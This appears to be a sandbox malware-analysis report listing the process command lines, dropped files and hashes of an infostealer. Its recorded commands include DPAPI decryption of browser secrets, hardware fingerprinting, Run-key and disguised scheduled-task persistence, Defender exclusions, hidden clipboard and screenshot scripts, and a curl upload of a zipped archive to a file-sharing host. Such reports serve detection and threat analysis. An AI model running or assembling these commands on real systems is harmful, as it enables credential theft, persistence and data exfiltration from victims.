powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BB5.tmp" "c:\Users\Admin\AppData\Local\Temp\vceksnax\CSCD2DBB8F6B0184DA7A2FC58E67274FB2.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 2f21a2953ac6229e434d4beaa677384b 1ajPKFnEw0CG6MkFLIcXBA.0.1.0.0.0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Spdohfma.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff7a5dab58,0x7fff7a5dab68,0x7fff7a5dab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4576 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2608 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1832 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3164 --field-trial-handle=1900,i,4834358073767547969,13285869430476635246,131072 /prefetch:1

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

C:\Users\Admin\AppData\Local\Temp\temp.ps1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svi3s4bl.xl3.ps1

\??\c:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\p22tuu2q\CSCA1265762AF2049E0913954F9F1C15260.TMP

C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp

C:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.dll

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

\??\c:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\vceksnax\CSCD2DBB8F6B0184DA7A2FC58E67274FB2.TMP

C:\Users\Admin\AppData\Local\Temp\RES8BB5.tmp

C:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 115a62a09c5e39743a3690445719af73
SHA1 98e8d72fca15ee667624b11f0789bfcbd9efeba6
SHA256 cec35d870692683c1ce1a89be8ef919ccc2773e78e42b1d789e9d796a261d921
SHA512 9a56a5f8ccc89dbcc08e706e7173a2baabd43fabc7ba82c7ee5a5eee9b097cc3bf16b28cc5d2aa8c75d0a33b8b638420e2b5bbba0c352f30c02217db2a57d588

C:\ProgramData\Steam\Launcher\EN-Spdohfma\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
